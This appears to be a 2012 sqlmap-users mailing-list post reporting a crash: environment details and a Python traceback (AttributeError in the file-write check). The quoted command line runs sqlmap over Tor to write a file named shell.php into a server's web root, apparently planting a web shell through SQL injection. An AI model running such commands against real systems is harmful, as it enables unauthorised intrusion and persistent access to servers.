[sqlmap-users] (no subject)
Brought to you by:
inquisb
From: Shadow F. <sha...@gm...> - 2012-04-03 15:44:51
|
sqlmap version: 1.0-dev (r4930) Python version: 2.6.5 Operating system: posix Command line: sqlmap.py -u ******************************************************** --tor --dbms=mysql --file-write=shell.php --file-dest=/srv/www/htdocs/shell.php --level 3 --risk 2 Technique: ERROR Back-end DBMS: MySQL (fingerprinted) Traceback (most recent call last): File "/pentest/database/sqlmap/_sqlmap.py", line 82, in main start() File "/pentest/database/sqlmap/lib/controller/controller.py", line 573, in start action() File "/pentest/database/sqlmap/lib/controller/action.py", line 132, in action conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType) File "/pentest/database/sqlmap/plugins/generic/filesystem.py", line 326, in writeFile self.unionWriteFile(wFile, dFile, fileType, confirm) File "/pentest/database/sqlmap/plugins/dbms/mysql/filesystem.py", line 98, in unionWriteFile self.askCheckWrittenFile(wFile, dFile, fileType) File "/pentest/database/sqlmap/plugins/generic/filesystem.py", line 239, in askCheckWrittenFile self.__checkWrittenFile(wFile, dFile, fileType) File "/pentest/database/sqlmap/plugins/generic/filesystem.py", line 115, in __checkWrittenFile if dFileSize and dFileSize.isdigit(): AttributeError: 'list' object has no attribute 'isdigit' [*] shutting down at 09:40:59 |